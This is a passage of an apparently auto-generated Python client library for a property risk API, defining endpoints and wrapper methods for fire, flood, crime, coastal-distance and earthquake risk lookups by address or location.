settings={
'response_type': (FireHistory,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/firehistory',
'operation_id': 'get_fire_history',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'post_code',
'start_date',
'end_date',
'max_candidates',
],
'required': [
'post_code',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'post_code':
(str,),
'start_date':
(str,),
'end_date':
(str,),
'max_candidates':
(str,),
},
'attribute_map': {
'post_code': 'postCode',
'start_date': 'startDate',
'end_date': 'endDate',
'max_candidates': 'maxCandidates',
},
'location_map': {
'post_code': 'query',
'start_date': 'query',
'end_date': 'query',
'max_candidates': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_fire_risk_by_address_endpoint = _Endpoint(
settings={
'response_type': (FireRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/fire/byaddress',
'operation_id': 'get_fire_risk_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'include_geometry',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'address': 'address',
'include_geometry': 'includeGeometry',
},
'location_map': {
'address': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_fire_risk_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (FireRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/fire/byaddress',
'operation_id': 'get_fire_risk_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'fire_risk_by_address_request',
],
'required': [
'fire_risk_by_address_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'fire_risk_by_address_request':
(FireRiskByAddressRequest,),
},
'attribute_map': {
},
'location_map': {
'fire_risk_by_address_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.get_fire_risk_by_location_endpoint = _Endpoint(
settings={
'response_type': (FireRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/fire/bylocation',
'operation_id': 'get_fire_risk_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'include_geometry',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'include_geometry': 'includeGeometry',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_fire_risk_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (FireRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/fire/bylocation',
'operation_id': 'get_fire_risk_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'fire_risk_by_location_request',
],
'required': [
'fire_risk_by_location_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'fire_risk_by_location_request':
(FireRiskByLocationRequest,),
},
'attribute_map': {
},
'location_map': {
'fire_risk_by_location_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.get_fire_station_by_address_endpoint = _Endpoint(
settings={
'response_type': (FireStations,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/firestation/byaddress',
'operation_id': 'get_fire_station_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'max_candidates',
'travel_time',
'travel_time_unit',
'travel_distance',
'travel_distance_unit',
'sort_by',
'historic_traffic_time_bucket',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'max_candidates':
(str,),
'travel_time':
(str,),
'travel_time_unit':
(str,),
'travel_distance':
(str,),
'travel_distance_unit':
(str,),
'sort_by':
(str,),
'historic_traffic_time_bucket':
(str,),
},
'attribute_map': {
'address': 'address',
'max_candidates': 'maxCandidates',
'travel_time': 'travelTime',
'travel_time_unit': 'travelTimeUnit',
'travel_distance': 'travelDistance',
'travel_distance_unit': 'travelDistanceUnit',
'sort_by': 'sortBy',
'historic_traffic_time_bucket': 'historicTrafficTimeBucket',
},
'location_map': {
'address': 'query',
'max_candidates': 'query',
'travel_time': 'query',
'travel_time_unit': 'query',
'travel_distance': 'query',
'travel_distance_unit': 'query',
'sort_by': 'query',
'historic_traffic_time_bucket': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_fire_station_by_location_endpoint = _Endpoint(
settings={
'response_type': (FireStations,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/firestation/bylocation',
'operation_id': 'get_fire_station_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'max_candidates',
'travel_time',
'travel_time_unit',
'travel_distance',
'travel_distance_unit',
'sort_by',
'historic_traffic_time_bucket',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'max_candidates':
(str,),
'travel_time':
(str,),
'travel_time_unit':
(str,),
'travel_distance':
(str,),
'travel_distance_unit':
(str,),
'sort_by':
(str,),
'historic_traffic_time_bucket':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'max_candidates': 'maxCandidates',
'travel_time': 'travelTime',
'travel_time_unit': 'travelTimeUnit',
'travel_distance': 'travelDistance',
'travel_distance_unit': 'travelDistanceUnit',
'sort_by': 'sortBy',
'historic_traffic_time_bucket': 'historicTrafficTimeBucket',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'max_candidates': 'query',
'travel_time': 'query',
'travel_time_unit': 'query',
'travel_distance': 'query',
'travel_distance_unit': 'query',
'sort_by': 'query',
'historic_traffic_time_bucket': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_flood_risk_by_address_endpoint = _Endpoint(
settings={
'response_type': (FloodRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/flood/byaddress',
'operation_id': 'get_flood_risk_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'include_zone_desc',
'include_geometry',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'include_zone_desc':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'address': 'address',
'include_zone_desc': 'includeZoneDesc',
'include_geometry': 'includeGeometry',
},
'location_map': {
'address': 'query',
'include_zone_desc': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_flood_risk_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (FloodRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/flood/byaddress',
'operation_id': 'get_flood_risk_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'flood_risk_by_address_request',
],
'required': [
'flood_risk_by_address_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'flood_risk_by_address_request':
(FloodRiskByAddressRequest,),
},
'attribute_map': {
},
'location_map': {
'flood_risk_by_address_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_flood_risk_by_location_endpoint = _Endpoint(
settings={
'response_type': (FloodRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/flood/bylocation',
'operation_id': 'get_flood_risk_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'include_zone_desc',
'include_geometry',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'include_zone_desc':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'include_zone_desc': 'includeZoneDesc',
'include_geometry': 'includeGeometry',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'include_zone_desc': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_flood_risk_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (FloodRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/flood/bylocation',
'operation_id': 'get_flood_risk_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'flood_risk_by_location_request',
],
'required': [
'flood_risk_by_location_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'flood_risk_by_location_request':
(FloodRiskByLocationRequest,),
},
'attribute_map': {
},
'location_map': {
'flood_risk_by_location_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
def get_crime_risk_by_address(
self,
address,
**kwargs
):
"""Get Crime Risk By Address # noqa: E501
Accepts addresses as input and Returns local crime indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_crime_risk_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): free form address text
Keyword Args:
type (str): this is crime type; valid values are following 11 crime types with 'all' as default (more than one can also be given as comma separated types). [optional]
include_geometry (str): Y or N (default is N) - if it is Y, then geometry will be part of response. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CrimeRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_crime_risk_by_address_endpoint.call_with_http_info(**kwargs)
def get_crime_risk_by_address_batch(
self,
crime_risk_by_address_batch_request,
**kwargs
):
"""Post Crime Risk By Address # noqa: E501
This is a Batch offering for 'Crime Risk By Address' service. It accepts a single address or a list of addresses and retrieve local crime indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_crime_risk_by_address_batch(crime_risk_by_address_batch_request, async_req=True)
>>> result = thread.get()
Args:
crime_risk_by_address_batch_request (CrimeRiskByAddressBatchRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CrimeRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['crime_risk_by_address_batch_request'] = \
crime_risk_by_address_batch_request
return self.get_crime_risk_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_crime_risk_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Crime Risk By Location # noqa: E501
Accepts latitude/longitude as input and returns and Returns local crime indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_crime_risk_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): The longitude of the location
latitude (str): The latitude of the location
Keyword Args:
type (str): this is crime type; valid values are following 11 crime types with 'all' as default (more than one can also be given as comma separated types). [optional]
include_geometry (str): Y or N (default is N) - if it is Y, then geometry will be part of response. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CrimeRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_crime_risk_by_location_endpoint.call_with_http_info(**kwargs)
def get_crime_risk_by_location_batch(
self,
crime_risk_by_location_batch_request,
**kwargs
):
"""Post Crime Risk By Location # noqa: E501
This is a Batch offering for 'Crime Risk By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieve local crime indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_crime_risk_by_location_batch(crime_risk_by_location_batch_request, async_req=True)
>>> result = thread.get()
Args:
crime_risk_by_location_batch_request (CrimeRiskByLocationBatchRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CrimeRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['crime_risk_by_location_batch_request'] = \
crime_risk_by_location_batch_request
return self.get_crime_risk_by_location_batch_endpoint.call_with_http_info(**kwargs)
def get_distance_to_coast_by_address(
self,
**kwargs
):
"""Get Distance To Flood Hazard By Address # noqa: E501
Accepts addresses as input and Returns the distance from nearest water bodies along with body name and location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distance_to_coast_by_address(async_req=True)
>>> result = thread.get()
Keyword Args:
address (str): The address of the location. [optional]
max_candidates (str): This specifies the value of maxCandidates. [optional]
water_body_type (str): This specifies the value of waterBodyType. [optional]
search_distance (str): This specifies the search distance. [optional]
search_distance_unit (str): miles (default value),feet, kilometers, meters. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
WaterBodyResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
return self.get_distance_to_coast_by_address_endpoint.call_with_http_info(**kwargs)
def get_distance_to_coast_by_address_batch(
self,
distance_to_flood_hazard_address_request,
**kwargs
):
"""Post Distance To Flood Hazard By Address # noqa: E501
This is a Batch offering for 'Distance To Flood Hazard By Address' service. It accepts a single address or a list of addresses and retrieve the distance from nearest water bodies along with body name and location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distance_to_coast_by_address_batch(distance_to_flood_hazard_address_request, async_req=True)
>>> result = thread.get()
Args:
distance_to_flood_hazard_address_request (DistanceToFloodHazardAddressRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DistanceToFloodHazardResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['distance_to_flood_hazard_address_request'] = \
distance_to_flood_hazard_address_request
return self.get_distance_to_coast_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_distance_to_coast_by_location(
self,
**kwargs
):
"""Get Distance To Flood Hazard By Location # noqa: E501
Accepts latitude & longitude as input and Returns the distance from nearest water bodies along with body name and location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distance_to_coast_by_location(async_req=True)
>>> result = thread.get()
Keyword Args:
longitude (str): The longitude of the location. [optional]
latitude (str): The latitude of the location. [optional]
max_candidates (str): This specifies the value of maxCandidates. [optional]
water_body_type (str): This specifies the value of waterBodyType. [optional]
search_distance (str): This specifies the search distance. [optional]
search_distance_unit (str): miles (default value),feet, kilometers, meters. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
WaterBodyResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
return self.get_distance_to_coast_by_location_endpoint.call_with_http_info(**kwargs)
def get_distance_to_coast_by_location_batch(
self,
distance_to_flood_hazard_location_request,
**kwargs
):
"""Post Distance To Flood Hazard By Location # noqa: E501
This is a Batch offering for 'Distance To Flood Hazard By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieve the distance from nearest water bodies along with body name and location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distance_to_coast_by_location_batch(distance_to_flood_hazard_location_request, async_req=True)
>>> result = thread.get()
Args:
distance_to_flood_hazard_location_request (DistanceToFloodHazardLocationRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DistanceToFloodHazardResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['distance_to_flood_hazard_location_request'] = \
distance_to_flood_hazard_location_request
return self.get_distance_to_coast_by_location_batch_endpoint.call_with_http_info(**kwargs)
def get_earthquake_history(
self,
post_code,
**kwargs
):
"""Earthquake History # noqa: E501
Accepts postcode as input and Returns historical earthquake details for a particular postcode. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_history(post_code, async_req=True)
>>> result = thread.get()
Args:
post_code (str): 5 digit Postal code to search
Keyword Args:
start_date (str): Start time in milliseconds(UTC). [optional]
end_date (str): End time in milliseconds(UTC). [optional]
min_magnitude (str): Minimum richter scale magnitude. [optional]
max_magnitude (str): Maximum Richter scale magnitude. [optional]
max_candidates (str): Maximum response events. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
EarthquakeHistory
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['post_code'] = \
post_code
return self.get_earthquake_history_endpoint.call_with_http_info(**kwargs)
def get_earthquake_risk_by_address(
self,
address,
**kwargs
):
"""Get Earthquake Risk By Address # noqa: E501
Accepts addresses as input and Returns counts of earthquakes for various richter measurements and values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_risk_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): free form address text
Keyword Args:
richter_value (str): all (default value), R0, R1, R2, R3, R4, R5, R6, R7, R0_GE, R1_GE, R2_GE, R3_GE, R4_GE, R5_GE, R6_GE, R7_GE. [optional]
include_geometry (str): Y or N (default is N) - if it is Y, then geometry will be part of response. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
EarthquakeRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_earthquake_risk_by_address_endpoint.call_with_http_info(**kwargs)
def get_earthquake_risk_by_address_batch(
self,
earthquake_risk_by_address_request,
**kwargs
):
"""Post Earthquake Risk By Address # noqa: E501
